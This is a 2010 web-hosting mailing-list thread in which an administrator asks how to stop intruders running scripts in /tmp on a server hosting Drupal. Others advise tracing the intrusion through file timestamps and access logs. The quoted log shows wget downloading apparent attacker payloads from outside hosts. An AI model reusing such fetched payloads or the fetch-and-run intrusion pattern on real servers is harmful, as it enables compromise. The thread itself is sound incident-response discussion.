[BlueOnyx:05937] Re: hacker scripts

Mon, 29 Nov 2010 09:58:15 -0800 

----- Original Message ----- 
From: "Gerald Waugh" <[email protected]>
To: "BlueOnyx General Mailing List" <[email protected]>
Sent: Monday, November 29, 2010 9:28 AM
Subject: [BlueOnyx:05934] Re: hacker scripts


>
> On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
>> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
>> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
>> > > How can I stop these people from downloading and running their 
>> > > scripts
>> > > in /tmp using httpd
>> >
>> > You need to find out how they did it. You're either hosting someone 
>> > naughty, or someone who has an insecure script. Who owns the files?
>> >
>>   apache.apache
>>
>> The server has a site with Drupal and some other blog stuff
>>
>
> /tmp type ext3 (rw,noexec,nosuid)
>
>
>
> [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not
> exist:
> /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> --06:02:38--  http://193.136.136.86/quixplorer/readme.txt
>           => `readme.txt'
> Connecting to 193.136.136.86:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 27,931 (27K) [text/plain]
>
>    0K .......... .......... .......                         100%
> 56.99
> KB/s
>
> 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
>
> --06:02:39--  http://realezsites.com/pers/cowtipper524/dc.txt
>           => `dc.txt'
> Resolving realezsites.com... 64.235.52.10
> Connecting to realezsites.com|64.235.52.10|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 2,140 (2.1K) [text/plain]
>
>    0K ..                                                    100%
> 2.40
> MB/s
>
> 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
>
> -- 
> Gerald
>


Look at the time the files in the /tmp were created. Then look in your 
access logs and see what site / php script was accessed at that time.

Check your drupal version and search on Google for
"Exploits for Drupal version xxx"


----
Ken M
Precision Web Hosting, Inc.
http://www.precisionweb.net



_______________________________________________
Blueonyx mailing list
[email protected]
http://www.blueonyx.it/mailman/listinfo/blueonyx

Reply via email to